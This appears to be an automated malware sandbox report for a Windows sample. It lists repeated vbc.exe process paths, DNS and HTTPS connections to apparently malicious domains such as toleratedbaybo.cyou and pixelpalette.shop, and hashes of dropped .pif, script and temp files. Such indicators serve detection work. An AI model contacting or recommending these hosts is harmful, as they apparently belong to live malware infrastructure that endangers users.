C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fiuflJZlSGqtte.fiuflJZlSGqtte | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | toleratedbaybo.cyou | udp |
| US | 104.21.38.229:443 | toleratedbaybo.cyou | tcp |
| US | 8.8.8.8:53 | 229.38.21.104.in-addr.arpa | udp |
| US | 104.21.38.229:443 | toleratedbaybo.cyou | tcp |
| US | 104.21.38.229:443 | toleratedbaybo.cyou | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 104.21.38.229:443 | toleratedbaybo.cyou | tcp |
| US | 104.21.38.229:443 | toleratedbaybo.cyou | tcp |
| US | 104.21.38.229:443 | toleratedbaybo.cyou | tcp |
| US | 8.8.8.8:53 | cdn1.pixel-story.shop | udp |
| US | 172.67.185.54:443 | cdn1.pixel-story.shop | tcp |
| US | 8.8.8.8:53 | pixelpalette.shop | udp |
| US | 172.67.191.17:443 | pixelpalette.shop | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.185.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.191.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mindfusteps.shop | udp |
| MD | 213.159.73.34:443 | mindfusteps.shop | tcp |
| US | 8.8.8.8:53 | 34.73.159.213.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Coordination
| MD5 | 485f89cfaf1420f132a95a0b7c6e6305 |
| SHA1 | efb827df52282fb79b5f44ec9e63b8e5a47c37e1 |
| SHA256 | eea03a384671dd1323b8d853ed49df8a27dbc2a706400437bd8d48e6076453bd |
| SHA512 | 116c823265a05c4b338e94204ce48267f112d12e55a8473fc05426af0a476c37fc272408eb805d117f6e8cab059fbd708c6158bd041ff3e9a8a430a577cc669b |
C:\Users\Admin\AppData\Local\Temp\Portfolio
| MD5 | 4d06e14fe2951aa0024c22936e5f531b |
| SHA1 | c718b677b65d246033898069459f078a00f650be |
| SHA256 | 0e3ab81f015e71af9b43ed7fd5854c3560c6ce09443b0cbffb0ac6c10d93d918 |
| SHA512 | 5bf78bc3bfce3553dff1e80ec3fef4c2589e618b1a3ac2723ed89a24c5fdd78b5e80f2bc778346f21b2c5f9750c00ea7a5ba9b3bd42f9f9f804ef838b92c887c |
C:\Users\Admin\AppData\Local\Temp\Shoppers
| MD5 | 52620731f9486725cceaf71e1a45cc9f |
| SHA1 | 0d166e1027ae7903dced0abe3570f71516fc5baf |
| SHA256 | 73e5301ad4b4aea78e34de20b8088641fc1d04b1444ed4ecbc6da47603d87cc2 |
| SHA512 | b4546af693050332c0477dd38b5e816ac2fe490d550ae296ef759714c33c96a648e4ed96294b777392bbfaf6fba876460f78c5730ecc61ef801f45cdb298dc36 |
C:\Users\Admin\AppData\Local\Temp\Canada
| MD5 | d426ef537d4e36651d372eb67de61c71 |
| SHA1 | c00ecae6e973056c698680c714bd8c932df53c56 |
| SHA256 | f0919fbdae23b005eb403344118d8509a316037ae5460484d81d8452a74812e3 |
| SHA512 | d042b71e1badef416e42f8c1235163ed7a71ae5d3cd897aca1dbb2b344769428b37e71e7b9b1a6c0ffbfdab8222eff893fc28415389b5afdcd262bd7eb7a40d6 |
C:\Users\Admin\AppData\Local\Temp\Dv
| MD5 | 367fecb6d4d73f3e22e2186fbe91f216 |
| SHA1 | 2bce21a05dfeee536cda999fbaa73c1af28b9d86 |
| SHA256 | 11741c20239ea1dd1c392abda3ee226e16ad2fd004f8fe344d2d068c8e20ef62 |
| SHA512 | 09009011345cc71715ba9ff975d0d304d3160090281a3c9672187b2f2c3eeab3653c31849f1306ae3d77459e0de8f63ce2037c0d330c16c361491d32b089b315 |
C:\Users\Admin\AppData\Local\Temp\Admissions
| MD5 | b9675af1aafe9bbc3397bb840117840a |
| SHA1 | e0fae0f4ef594f472216025e838fadbb2aa0b861 |
| SHA256 | 875276f91f4aa27b3d23da12c88e94871fe7ed6401ec8f4657b4f6be2f33a01d |
| SHA512 | 70a24225488d1e41f36244d7811766e2379b8c90ea57d1fb5d33b54e2f62e032002a7c2e45aeb8f47e45840a6cc16cfed5680f88e71de68b3a15af73db24a5e6 |
C:\Users\Admin\AppData\Local\Temp\Strand
| MD5 | cd7bd19edb3ded5365bab0e5956309db |
| SHA1 | 1e0d4ba49a9592faebcfa4119f523ca7735108bb |
| SHA256 | 84078ab15033945d702802a013fbc3142b56db1371ff79ba1107df211300d803 |
| SHA512 | 574476aaf140810d1cfd9a99187097d68c024c89c57f82a2399e2933f46e854989364759e35474048eaad35b817c63d05e19ed75393ec893bbaf57f7061d96e4 |
C:\Users\Admin\AppData\Local\Temp\Boring
| MD5 | 10e29c8822f7da216b45a11d3ee0eda8 |
| SHA1 | 23e62cb3f04cd00b22fe54a65e3b81518c78e614 |
| SHA256 | 4a4f9151f243bd1eca82a0721bae4136e37c3835324991516c62fc70f99dcb05 |
| SHA512 | c0a2772c8ae6c4b450f38327c8386f526ffff7f3bec3bf6e495a2a01b465da64de4d815e51961f37cb43239b05d3fd53a01fb4b33cd0fa67a84680bc24ffe572 |
C:\Users\Admin\AppData\Local\Temp\Evaluation
| MD5 | 9c1eec6ad97d3430478939c6df01ea8a |
| SHA1 | be6e6c3fbb3fb22e34d7b5bc2c1a2d996bb4e81e |
| SHA256 | fbc43c30a07c44894f7870d666d3e370f4d5f77695d5fa727597884c1495fc9b |
| SHA512 | 2f4923eccd70a2790b6a6e4876f91aa9fd87b7e767abac3e48084b14de21a7beccf471eca35b9df1069e67ed18407916213ff7b52b129fe252c7169b2081bad6 |
C:\Users\Admin\AppData\Local\Temp\Synthetic
| MD5 | c0391116646bfea7d85bb681a33e3ba0 |
| SHA1 | 9996422133ed60d69b923b118949183e8758e0a3 |
| SHA256 | 5791d23d4c78f0e17d98eee9e51ebf24ea678fdf9b059bfb5dcf19c16dcba85a |
| SHA512 | 3e6a4e31ad6161fa617aa116378d9817390a031e640a157cdda299e8d0dddc4e27517ff53ed56081c0c34b348be627b6a5ab6f1c1ae9192f34a446ba19b23f47 |
C:\Users\Admin\AppData\Local\Temp\208231\War.pif
| MD5 | 78ba0653a340bac5ff152b21a83626cc |
| SHA1 | b12da9cb5d024555405040e65ad89d16ae749502 |
| SHA256 | 05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7 |
| SHA512 | efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317 |
C:\Users\Admin\AppData\Local\Temp\208231\O
| MD5 | 36464052c5bab6fbe9375ae0c39f051a |
| SHA1 | cd35ee319164eb8a73bc8b5f86fea33b7227ae64 |
| SHA256 | d0b9c83c8bddbe2d9e18b0e8c5e3abcdb3bac5a9f6f3058fc3bcb8d3fde78ced |
| SHA512 | 01a7c98f1fa174dfc72360372b01e641a432e5b429ac3a366a9648f42e1776e9cfd5f9834173a8483fc470b1ec7fcadde7a7f639e07f08dadf460f5b46e9cb59 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfruxvds.332.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\K1HDCVMZ3CHA6WL98LCQ54O6LSAEU.ps1
| MD5 | a93ef812fcdf3af24ff8b33a75d4992e |
| SHA1 | b282892bd321a8709474f43d790d7e661edaa98f |
| SHA256 | d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6 |
| SHA512 | 272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f48374bf42e705689df188bd0e8fa105 |
| SHA1 | 4e46ca4b09158875153f7188acd11f335a891d4f |
| SHA256 | 994544725ccd58a4c4becbddce321d366371e9f1b9d5ddd5c2c4f7b28d0c88af |
| SHA512 | cd87435b528190c27d8010fb0f2b9e797d7f3b0a5a67ad8de8c78c3972d0af002d78fcd75125a379bccbc57889f5903790e97b92ebe1e603c751b4ac4bd46f3b |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | def65711d78669d7f8e69313be4acf2e |
| SHA1 | 6522ebf1de09eeb981e270bd95114bc69a49cda6 |
| SHA256 | aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c |
| SHA512 | 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7 |
C:\Users\Admin\AppData\Roaming\0VYTBW.pif
| MD5 | 3f58a517f1f4796225137e7659ad2adb |
| SHA1 | e264ba0e9987b0ad0812e5dd4dd3075531cfe269 |
| SHA256 | 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48 |
| SHA512 | acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634 |
C:\Users\Admin\AppData\Roaming\KHOIE0.vsd
| MD5 | 3c6d0866e54ab391bc09713fde4c9d38 |
| SHA1 | a1a4e9c067e3c85739e85fb45f7ecdb363bcf856 |
| SHA256 | ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682 |
| SHA512 | eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4 |